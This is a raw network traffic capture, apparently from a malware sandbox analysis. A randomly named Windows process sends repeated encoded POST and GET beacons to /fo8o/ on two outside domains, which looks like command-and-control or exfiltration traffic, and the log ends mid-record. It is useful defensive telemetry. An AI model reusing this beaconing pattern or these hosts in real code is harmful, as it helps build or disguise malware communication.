Apr 19, 2024 03:28:47.176548958 CEST	784	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 207 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 33 4f 6a 34 68 39 38 78 6f 45 48 42 33 45 74 49 7a 2f 63 65 67 36 4e 67 68 4d 58 57 72 64 61 4a 39 74 62 66 31 64 53 36 4e 39 38 Data Ascii: bD=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmff3Oj4h98xoEHB3EtIz/ceg6NghMXWrdaJ9tbf1dS6N98
Apr 19, 2024 03:28:47.510149002 CEST	360	IN	HTTP/1.1 404 Not Found Date: Fri, 19 Apr 2024 01:28:47 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49720	202.172.28.202	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:28:50.048801899 CEST	808	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 231 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4b 5a 72 6c 52 67 5a 6e 67 57 64 73 44 35 32 6e 7a 57 4c 39 67 41 53 68 42 78 56 6e 79 51 45 74 35 72 53 55 34 69 6d 36 6c 68 38 71 66 79 69 6e 77 68 47 74 4a 4f 31 47 62 49 4d 4c 68 67 6f 42 69 70 58 65 67 55 46 2b 53 68 63 32 75 4f 6d 57 45 70 6a 35 6f 58 71 59 57 53 79 67 41 74 4d 50 2b 68 7a 47 74 66 43 58 30 50 61 42 45 41 32 67 4a 48 61 44 4f 48 6d 52 31 50 77 32 41 35 34 68 4a 59 2f 45 42 46 33 55 41 2f 2f 4d 77 61 50 67 6a 55 6c 57 4c 64 77 4c 39 56 62 4e 69 52 31 31 35 59 66 6a 57 6e 42 41 63 64 55 44 72 35 61 41 7a 63 56 2f 4b 33 69 4f 77 3d 3d Data Ascii: bD=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/KZrlRgZngWdsD52nzWL9gAShBxVnyQEt5rSU4im6lh8qfyinwhGtJO1GbIMLhgoBipXegUF+Shc2uOmWEpj5oXqYWSygAtMP+hzGtfCX0PaBEA2gJHaDOHmR1Pw2A54hJY/EBF3UA//MwaPgjUlWLdwL9VbNiR115YfjWnBAcdUDr5aAzcV/K3iOw==
Apr 19, 2024 03:28:50.369190931 CEST	360	IN	HTTP/1.1 404 Not Found Date: Fri, 19 Apr 2024 01:28:50 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49721	202.172.28.202	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:28:52.930949926 CEST	1821	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1243 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4a 35 72 6c 6a 6f 5a 6d 48 43 64 2b 54 35 32 6b 7a 57 62 39 67 42 4f 68 46 64 5a 6e 79 55 36 74 36 54 53 57 62 36 6d 72 77 56 38 35 2f 79 69 34 41 68 46 77 5a 4f 67 47 62 59 41 4c 67 51 6f 42 69 70 58 65 6c 51 46 39 48 64 63 37 4f 4f 6c 58 45 70 6b 39 6f 58 43 59 57 72 4b 67 41 35 63 4d 4b 74 7a 46 4e 50 43 55 47 6e 61 48 55 41 30 6a 4a 47 48 44 4f 4c 48 52 31 54 38 32 41 4e 65 68 4c 45 2f 41 56 6c 75 46 42 62 61 65 6d 4f 43 67 30 6b 56 61 66 56 31 48 2b 4a 73 4b 6a 74 4a 72 59 4d 53 6f 77 58 6e 57 61 59 70 41 4c 64 62 4e 47 4e 35 33 62 32 47 63 2f 57 71 46 6a 52 35 78 62 6d 48 78 65 69 51 6f 32 45 61 62 30 4a 6f 6c 4f 46 4d 75 6f 33 2f 39 63 64 79 6e 30 6e 68 4e 4c 56 46 70 4e 72 4d 73 30 30 44 4e 56 7a 57 6d 4b 6c 30 63 58 52 55 4f 77 45 39 73 51 2b 4b 64 73 75 43 68 6e 52 64 44 34 34 7a 64 49 53 30 33 77 48 4a 62 32 66 58 6a 77 32 71 35 35 5a 56 4e 64 61 32 59 51 56 4b 6f 68 45 37 44 41 34 38 41 6c 31 4c 73 31 47 33 63 6b 4a 36 62 6d 6d 35 50 62 49 77 46 66 59 68 68 4a 57 75 71 52 71 4f 63 63 76 76 73 6f 31 43 32 35 5a 45 2b 7a 62 2f 47 36 47 79 4f 4e 44 75 34 30 61 39 78 79 5a 46 4f 6b 31 69 35 6b 64 79 36 59 4f 78 46 37 33 37 41 46 57 35 61 4b 42 6a 63 69 50 77 50 57 30 6c 66 58 6a 71 54 30 50 6c 71 39 52 32 52 55 42 6b 74 67 6c 6f 56 4d 6a 36 55 45 56 6f 2f 73 34 74 7a 39 45 31 77 31 74 44 75 61 71 71 6a 78 54 52 44 78 31 77 39 59 50 45 32 77 79 51 4c 4c 6a 59 6a 33 6b 55 55 48 64 62 45 4b 39 50 74 6c 63 39 56 53 42 38 39 39 42 57 31 55 4b 73 54 2f 46 55 65 58 35 58 34 48 6d 64 37 74 30 46 61 33 42 2f 59 77 47 57 70 5a 6e 57 5a 79 30 36 57 30 36 35 75 58 66 43 66 53 62 72 79 30 63 7a 4b 31 30 68 57 61 2f 6f 36 78 58 73 79 7a 66 70 72 50 38 30 4c 62 38 30 70 30 35 48 32 46 4a 6a 6e 55 71 4b 67 6e 58 42 68 53 4c 37 48 4e 68 53 2b 70 75 68 69 69 2b 64 52 67 2f 46 45 61 53 62 59 56 45 66 6e 58 65 58 71 6f 42 63 5a 6f 53 44 4f 51 53 65 42 38 48 38 57 2f 38 49 4a 63 32 4c 39 4a 71 34 42 58 2b 76 2f 7a 74 43 38 54 58 4e 6f 34 76 70 44 4e 49 6c 79 57 75 53 52 2f 6a 41 68 37 74 45 47 48 39 6c 57 79 62 56 6d 6c 42 65 4d 59 55 79 52 55 45 46 46 32 42 65 48 33 78 54 61 58 30 46 54 6f 48 6b 6a 78 69 4e 63 35 71 65 59 46 4d 78 5a 69 42 30 75 52 69 6d 6c 52 6f 43 31 70 6a 41 77 46 7a 4b 31 48 4c 50 76 59 63 42 2b 66 63 49 48 71 37 70 4a 75 73 2f 49 46 35 46 54 48 6e 68 30 2f 31 59 4e 42 78 35 54 6d 78 63 39 4b 45 6d 33 4b 77 45 4f 58 46 33 38 62 46 76 70 66 51 39 39 6d 59 6a 37 49 76 32 78 6f 4b 46 64 67 6e 38 54 61 66 77 36 4a 30 2f 2b 53 55 45 32 43 75 35 7a 59 4d 6e 2b 4d 52 4e 6b 57 76 76 49 2f 77 41 4d 53 47 6c 76 45 65 75 47 68 56 42 58 66 6a 6c 36 2f 58 45 4e 59 35 4a 39 52 33 79 53 42 31 46 5a 6d 33 48 6f 49 78 53 6d 43 63 4e 42 62 43 58 78 66 54 52 51 6f 6c 4a 52 39 55 35 42 74 4d 38 69 63 34 2b 65 4d 7a 43 36 6b 74 47 51 6d 30 38 6f 4c 38 41 7a 72 50 5a 6b 7a 37 63 2b 6c 58 37 54 47 76 76 4d 73 33 4a 41 46 39 6f 76 37 35 55 43 36 4d 48 4f 68 45 76 65 6e 5a 66 6a 32 4b 56 6d 52 46 44 6a 57 6c 56 5a 4e 44 65 49 76 34 50 6d 55 53 7a 33 79 7a 58 39 49 54 4c 53 71 68 79 73 76 38 6b 57 67 2b 4c 52 39 72 4e 48 6f 4e 71 66 36 4a 63 77 4a 31 4a 39 59 6c 36 51 31 38 39 6a 55 46 46 6f 46 68 63 2f 46 4d 72 43 74 76 33 6c 43 56 5a 4c 55 59 72 79 55 76 7a 77 53 33 6b 53 70 48 33 4e 58 67 4b 35 4e 37 53 67 32 51 4e 55 70 38 35 6f 73 70 69 4d 76 70 4f 6d 50 33 6e 6e 41 36 36 7a 70 63 62 4b 79 57 37 4a 4e 4f 70 6a 70 4a 6d 37 56 4a 63 6f 68 41 42 47 4c 53 2b 35 68 51 4a 35 68 79 41 51 46 2b 7a 42 6b 44 59 4f 56 39 69 6b 35 58 7a 69 37 6d 74 53 49 74 57 2b 77 33 4d 6c 54 71 76 53 70 78 54 78 71 6c 4a 31 67 55 52 68 53 41 78 45 76 2b 52 66 72 51 3d Data Ascii: bD=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/J5rljoZmHCd+T52kzWb9gBOhFdZnyU6t6TSWb6mrwV85/yi4AhFwZOgGbYALgQoBipXelQF9Hdc7OOlXEpk9oXCYWrKgA5cMKtzFNPCUGnaHUA0jJGHDOLHR1T82ANehLE/AVluFBbaemOCg0kVafV1H+JsKjtJrYMSowXnWaYpALdbNGN53b2Gc/WqFjR5xbmHxeiQo2Eab0JolOFMuo3/9cdyn0nhNLVFpNrMs00DNVzWmKl0cXRUOwE9sQ+KdsuChnRdD44zdIS03wHJb2fXjw2q55ZVNda2YQVKohE7DA48Al1Ls1G3ckJ6bmm5PbIwFfYhhJWuqRqOccvvso1C25ZE+zb/G6GyONDu40a9xyZFOk1i5kdy6YOxF737AFW5aKBjciPwPW0lfXjqT0Plq9R2RUBktgloVMj6UEVo/s4tz9E1w1tDuaqqjxTRDx1w9YPE2wyQLLjYj3kUUHdbEK9Ptlc9VSB899BW1UKsT/FUeX5X4Hmd7t0Fa3B/YwGWpZnWZy06W065uXfCfSbry0czK10hWa/o6xXsyzfprP80Lb80p05H2FJjnUqKgnXBhSL7HNhS+puhii+dRg/FEaSbYVEfnXeXqoBcZoSDOQSeB8H8W/8IJc2L9Jq4BX+v/ztC8TXNo4vpDNIlyWuSR/jAh7tEGH9lWybVmlBeMYUyRUEFF2BeH3xTaX0FToHkjxiNc5qeYFMxZiB0uRimlRoC1pjAwFzK1HLPvYcB+fcIHq7pJus/IF5FTHnh0/1YNBx5Tmxc9KEm3KwEOXF38bFvpfQ99mYj7Iv2xoKFdgn8Tafw6J0/+SUE2Cu5zYMn+MRNkWvvI/wAMSGlvEeuGhVBXfjl6/XENY5J9R3ySB1FZm3HoIxSmCcNBbCXxfTRQolJR9U5BtM8ic4+eMzC6ktGQm08oL8AzrPZkz7c+lX7TGvvMs3JAF9ov75UC6MHOhEvenZfj2KVmRFDjWlVZNDeIv4PmUSz3yzX9ITLSqhysv8kWg+LR9rNHoNqf6JcwJ1J9Yl6Q189jUFFoFhc/FMrCtv3lCVZLUYryUvzwS3kSpH3NXgK5N7Sg2QNUp85ospiMvpOmP3nnA66zpcbKyW7JNOpjpJm7VJcohABGLS+5hQJ5hyAQF+zBkDYOV9ik5Xzi7mtSItW+w3MlTqvSpxTxqlJ1gURhSAxEv+RfrQ=
Apr 19, 2024 03:28:53.279891014 CEST	360	IN	HTTP/1.1 404 Not Found Date: Fri, 19 Apr 2024 01:28:53 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49723	202.172.28.202	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:28:55.804569006 CEST	515	OUT	GET /fo8o/?bD=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8ssmc93kihOWHWb8NTA0vbQpCHGBmxgdm5sPEbG1Wvor0LSPPjnI=&VVq=lF_H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.kasegitai.tokyo Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Apr 19, 2024 03:28:56.147546053 CEST	360	IN	HTTP/1.1 404 Not Found Date: Fri, 19 Apr 2024 01:28:55 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49725	116.50.37.244	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:29:02.016653061 CEST	802	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 207 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 4f 7a 42 6a 36 4a 36 37 6b 76 66 53 54 37 30 43 57 78 57 66 67 72 67 58 30 55 65 42 5a 37 65 4f 56 45 76 6b 57 45 76 75 30 41 64 Data Ascii: bD=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOOzBj6J67kvfST70CWxWfgrgX0UeBZ7eOVEvkWEvu0Ad
Apr 19, 2024 03:29:02.305318117 CEST	599	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.goldenjade-travel.com/fo8o/ Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Credentials: true Date: Fri, 19 Apr 2024 01:29:01 GMT Connection: close Content-Length: 156 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49726	116.50.37.244	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:29:04.816023111 CEST	826	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 231 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 4c 69 58 32 4d 73 42 35 37 30 4d 56 38 76 32 42 49 49 68 41 6c 2b 38 2b 42 70 78 61 52 6b 2f 44 62 30 6e 74 44 6e 41 5a 64 45 59 67 3d 3d Data Ascii: bD=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwLiX2MsB570MV8v2BIIhAl+8+BpxaRk/Db0ntDnAZdEYg==
Apr 19, 2024 03:29:05.095027924 CEST	599	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.goldenjade-travel.com/fo8o/ Server: Microsoft-IIS/10.0 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Credentials: true Date: Fri, 19 Apr 2024 01:29:04 GMT Connection: close Content-Length: 156 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49727	116.50.37.244	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:29:07.740542889 CEST	1839	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1243 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 66 69 65 30 2f 78 4c 78 78 5a 52 42 6e 6e 4f 6d 38 30 5a 50 75 46 57 32 35 57 38 33 63 2f 